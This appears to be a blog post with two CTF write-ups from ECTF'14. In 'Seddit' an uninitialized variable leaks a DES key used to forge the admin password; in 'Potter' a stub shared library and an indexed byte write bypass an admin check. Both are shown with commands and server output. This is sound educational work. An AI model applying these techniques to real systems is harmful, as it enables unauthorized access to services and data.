Blog


ECTF'14 was last weekend.
Here is my writeup for the exploitation 400 Seddit:

Seddit has opened a new service to share posts and links through command line. Check it out here.

Hint: A pinch of ____
nc 212.71.235.214 6000 


Lets open the tar and see what the file is.

$ file seddit.tar.gz 
seddit.tar.gz: gzip compressed data, from Unix, last modified: Sat Oct 18 19:24:04 2014
$ tar -xvf seddit.tar.gz 
seddit
$ file seddit
seddit: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8ef4bbb0d0d50aab01844f4ec1b310261844a202, stripped

Looks like it is a 64 bit ELF file.
Lets run it and see what it does.

$ chmod +x ./seddit
$ ./seddit
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? ^C



The program allows you to create an account, login, and make posts (which it seems you can't view again later).

Looking in IDA we can follow the string "flag" and see that if you log in as an admin and it will print the flag.



Looking at the login function, it appears to call a function with your entered username as an argument.



In here a key file is being opened.



And a buffer originally containing 'aaaaaaa' is being overwritten, and concatenates the key to it.



And finally DES encryption is used on the username using the concatenated key to encrypt it.



This is returned and compared to the entered password for the user to login. However, byte_6020C0 (which is the last salt entered when creating an account) is set to 0 before running the encrypt function for the admin.



So the encryption key is 'aaaaaaa' followed by what is read from the file. The next step is to leak the key. When cross-referencing the string, we find that it is also opened in the make post method. The other thing to note about the make post method is that var_50 is only initialized if you choose to make a text post. However, it is still printed.



When testing on the server, I find that it doesn't seem to leak anything useful.

What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content:  	@
##############################



Then we notice that the salt variable (byte_6020C0) is used here as well. If we increase the length by creating an account, we can successfully leak the key:

What would you like to do? 1

Enter username:asdf

Enter salt:1234567890abcdef 
Your password is: 6d39088cc5fb4495
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content: highsec
�[
##############################


So the key is 'highsec'. Now we just need to encrypt. To make sure we use the right encryption, we can patch the program using idaPatcher to allow us to create an account as admin.



Now we can make a keyfile containing 'highsec' and try to login with a salt of 'aaaaaaa'

$ echo "highsec" > key
$ ./sedditPatched
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 1

Enter username:admin

Enter salt:aaaaaaa
Your password is: 94140f8339377477
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4


The encryption results in `94140f8339377477` Now lets try that password on the real server:

$ nc 212.71.235.214 6000
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 2
Enter username:admin
Enter password:94140f8339377477

Logged in as admin! flag{Encryption_is_Not_a_silver_bullet}
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4



The flag is `Encryption_is_Not_a_silver_bullet`





ECTF'14 was last weekend.
Here is my writeup for the exploitation 250 Potter:

Description
You have been able to get your hands on the flag storing program of ECTF flag system. But you don't have the required libECTFsecret.so file.
Can you still bypass the system?

nc 212.71.235.214 3050 


Lets extract the given zip and see what is inside

$ file potter.zip
potter.zip: Zip archive data, at least v2.0 to extract
$ unzip potter.zip
Archive:  potter.zip
  inflating: potter                  
$ file potter
potter: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=b2cc6510804360a6a2c08bed2f0f0a0fd25b0abb, not stripped


As expected the binary can't be run, as it is missing a the shared library.

$ chmod 777 ./potter
$ ./potter
./potter: error while loading shared libraries: libECTFsecret.so: cannot open shared object file: No such file or directory


Lets look at the file in IDA



Both the check_and_load_flag and load_pass methods are not available in the binary file, so they must have been in the shared library.

We can make our own fake library using these functions to run the binary.

fakeLib.c
#include 
#include 

int check_and_load_flag(char* flag) {
	puts("check_and_load_flag function call");
}

char* load_pass(char* pass) {
	puts ("load_pass function call");
}


Then compile that as a shared library and add it to /usr/lib

$ gcc -c -fpic fakeLib.c
$ gcc -shared -o libECTFsecret.so fakeLib.o
$ sudo cp libECTFsecret.so /usr/lib
$ sudo chmod 755 /usr/lib/libECTFsecret.so 
$ sudo ldconfig


Now we can run potter again and see if it works

$ ./potter
check_and_load_flag function call
load_pass function call
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:^C


Now back in ida we can look at the 'View flag' option.



The interesting thing here is that 'You do not have admin access!!' when the 50th byte of arg0 does not equal 0x41 or 'A'

The same arg0 is then printed to the screen with:



So the admin check is the 50th byte of the flag. So lets try setting that byte with the 'Set new flag' option.

$ ./potter
check_and_load_flag function call
load_pass function call
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:3
Maximum 25 characters
Format of input is
 (equal to flag[index - 1] = ch, index = 100 finishes editing)
:50 A
Set
:100 A
Want to save the flag?(1/0)
1
Admin access required to set the flag
Admin Access granted
check_and_load_flag function call


So we achived admin access. Lets test it again with the 'View flag' option:

Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:2



We did not get the warning. But no flag was printed. This is because our library never set a flag.
Lets test this on the real server now.

$ nc 212.71.235.214 3050
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:3
Maximum 25 characters
Format of input is
 (equal to flag[index - 1] = ch, index = 100 finishes editing)
:50 A
Set
:100 A
Want to save the flag?(1/0)
1
Admin access required to set the flag
Admin Access granted
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:2
flag{The_Flying_Phoenix}
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:^C


The flag is ``` The_Flying_Phoenix ```